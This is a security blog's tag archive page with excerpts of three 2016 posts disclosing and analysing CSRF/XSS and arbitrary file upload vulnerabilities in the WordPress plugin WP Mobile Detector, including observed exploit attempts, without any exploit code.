Login

Tag Archives: WP Mobile Detector

22 Jun 2016

Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in WP Mobile Detector

As we continue looking at ways we can improve the security of WordPress plugins, one of the thing we are trying is checking over plugins that we have recently added new vulnerabilities to our data set to see if we can find any other obvious vulnerabilities. The second we have spotted is in the plugin WP Mobile Detector. Unlike the arbitrary file upload vulnerability we spotted after some was looking to exploit it on this website, this cross-site request forgery (CSRF)/cross-site scripting (XSS) vulnerability on the settings page for the plugin is unlikely to be exploited.

The CSRF potion of this is due to a lack of nonce on the page. [Read more]

20 Jun 2016

Press Coverage Seems To Increase Hacker Interest In WordPress Plugin Vulnerability

When it comes to the discussion of WordPress security one thing that stands out for us is how much of what is being said seems to be, at best, not backed by factual information and in too many cases seems to be backed by outright falsehoods. So that makes gathering and analyzing data on security issues a much needed activity.

Recently we spotted what looked to be an attempt to exploit a vulnerability in the plugin WP Mobile Detector, a plugin with 10,000+ active installs according to wordpress.org, and we quickly found an arbitrary file upload vulnerability in the relevant file in the plugin, which turned out the be what was being exploited. After the vulnerability received a fair amount of press coverage we saw more requests that looked to be part of attempting to exploit the plugin. Now that it has been three weeks since this started we thought it would be a good time to take a closer look to see what impact that actually had. [Read more]

31 May 2016

Arbitrary File Upload Vulnerability in WP Mobile Detector

A few days ago we had a HEAD request for the file /blog/wp-content/plugins/wp-mobile-detector/resize.php, which is a file in the plugin WP Mobile Detector. Since we didn’t have that plugin installed that most likely explanation for that was someone was checking for the existence of the file before trying to exploit a vulnerability in the plugin. Looking around we couldn’t find any public information disclosure of vulnerability involving that particular file, but a quick look at the file showed that plugin has an arbitrary file upload vulnerability. The severity of the vulnerability is lessened by the fact that it requires the server to have an option enabled that introduces the potential for security risks like this.

The code in the file first checks if a file exists based on the GET or POST value “src”: [Read more]